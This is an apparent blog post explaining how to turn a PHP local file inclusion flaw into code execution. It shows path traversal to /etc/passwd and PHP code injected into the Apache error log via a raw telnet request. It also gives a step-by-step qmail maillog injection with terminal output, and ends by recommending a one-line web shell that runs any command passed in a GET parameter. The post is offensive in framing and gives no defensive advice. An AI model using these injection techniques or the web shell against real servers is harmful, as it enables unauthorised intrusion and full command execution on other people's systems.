I keep on ranting about file inclusion while this is not something we see every day. I promise this will be my last post on this subject for a while :)
First off, if you did no reconnaissance and you don't really know where you are on the file system but you do know where to go, don't worry about the amount of ../ you're using. You can't go beyond the root of the file system, the rest of the ../'s will just be ignored. So if you are in /var/www/vhosts/domain.com/httpdocs and you try to include ../../../../../../../../../../etc/passwd, it will work fine.
Now to actually include some PHP code! There are a few things you can do. Of course you could try to include external files, which would be the easy way to go.. but some administrators turn this feature off in the php.ini.
// ----- 1: apache error_log injection -----
Inject php code in the apache error log.
$ telnet xxx.xxx.xxx.xxx 80
Connected to xxx.xxx.xxx.xxx. Escape character is '^]'.
GET /< ?php phpinfo(); ? > HTTP/1.0
After that you can include the error log file. The embedde PHP code will be executed. a few places to look for the error log file:
// ----- 2: Malicious image upload -----
When the website allows its users to upload images (like avatars). You could use the method explained in my previous post: "'Safe' remote file inclusion" to upload a malicious image.
// ----- 3: Send e-mail -----
This is actually pretty hard to exploit, although it IS possible. You could of course try to send an e-mail to the web server user (e.g. apache@hostname) and include /var/spool/mail/apache. This method never worked for me, and i don't think any up-to-date linux system supports this 'feature'.
The second method is somewhat elaborate. I will explain it using qmail examples, but most mail servers support this feature.
You will need to include the maillog file. This is often located at /var/log/maillog. Now to inject some php code, look at the following example:
root@test:/# telnet localhost 25
Connected to localhost.
Escape character is '^]'.
220 hidden.domain.com ESMTP
MAIL FROM: anything < ?phpinfo();? >
RCPT TO: email@example.com
354 go ahead
250 ok 1186501618 qp 7063
Connection closed by foreign host.
root@test:/# grep phpinfo /var/log/maillog
Aug 7 17:46:59 test qmail: 1186501618.685225 info msg 3903353: bytes 198 from < ?phpinfo();? > qp 7086 uid 2020
Aug 7 17:46:59 test qmail-remote-handlers: from=?php-phpinfo();?
root@test:/# echo "< ?phpinfo();? >" | php
The above steps are:
- Telnet into the mail server.
- Fake the sender address: Anything < ?phpinfo();? >. (Spaces are replaced by underscores. So you need to prevent those.)
- Look for the phpinfo string in the log file
- Test it in PHP
And the files look like: 1186501037.4564.server.domain.com. (Meaning [timestamp].[PID].[hostname])
The filename can be guessed using the maillog, the approximate timestamp and PID will show up in this log file. Although its pretty hard to read if you're not familiar with this log format.
// ----- Conclusion -----
There are a lot of cool ways to include PHP snippets on a vulnerable server, the easiest one is to write it to the error_log file. This file is written by the web server, and easily accessible (without the open_basedir restrictions of course).
// ----- What to inject?! -----
The best start is to inject something like:
< ?system($_GET['x']);? >
This allows you to execute any command on the server using the x _GET value. After that you're practically in.